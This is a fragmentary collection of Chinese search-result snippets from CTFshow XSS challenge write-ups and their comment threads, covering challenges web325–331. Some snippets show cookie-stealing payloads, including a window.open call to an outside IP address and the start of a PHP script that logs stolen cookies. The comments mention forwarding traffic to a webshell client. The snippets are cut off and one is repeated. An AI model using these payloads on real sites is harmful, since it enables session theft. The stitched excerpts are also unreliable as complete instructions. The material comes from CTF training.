CTFshow UP :过滤了xss三个字母 猫不理め 回复@CTFshow :我选了xss平台payload,没有xss的,但是只拿到了自己的,想问下怎么拿到管理员的呢 Heart丶清沁 4-12 想知道那个服务器的请求转发给本地蚁剑是怎么弄的 CTFshow UP :netsh interface portproxy 阳光灬宅 2021-12-30 咋插别人的,那ip是啥 猫不理め ...
就是在xss平台上开启超强模式!不过有的平台是没有超强模式的,需要我们自己找一个! web328 这里是个登录的地方了!它是想让我们以admin的身份进行登录,但是我们需要知道它的cookie,从而构造出一下的脚本直接在注册框里面进行提交然后再服务器的日志里面就可以看到cookie了! window.open('http://47.95.235.67:8081/'...
web325过滤了. 前面那个String.fromCharCode生产payload web327 web328 web329 web320 web331 web322-323 参考链接 前言 以下需要师父们自己url解码哦,然后大部分使用了xss...
存储型xss;发送者和接受者都用的admin,剩余的随便,内容是: 拿到了flag,但是怎么就拿到了呢??? 看了视频,大师傅说的是,发送者是admin就行了 web 328 在本地,不知道为啥nc拿不到数据了,所以采用写接受脚本的方式来接受cookie <?php$data=$_GET['data'];$myfile=fopen('xss_flag.txt',"w")ordie("una...
Web329 在这个例子中,admin的sessionid每次会话都会变,所以没办法使用sessionid进行登录(机器人好像设置的是上去一下就下来),那么思路就是让注入的XSS Payload自动读取本页面的带有ctfshow的字段并发到vps上。 注册一个普通账号并登录,修改一个显示密码的地方为ctfshow{123456},然后尝试直接在console中将这段字段读出来并...
存储型xss;发送者和接受者都用的admin,剩余的随便,内容是: 拿到了flag,但是怎么就拿到了呢??? 看了视频,大师傅说的是,发送者是admin就行了 web 328 在本地,不知道为啥nc拿不到数据了,所以采用写接受脚本的方式来接受cookie <?php $data=$_GET['data']; $myfile=fopen('xss_flag.txt',"w") or...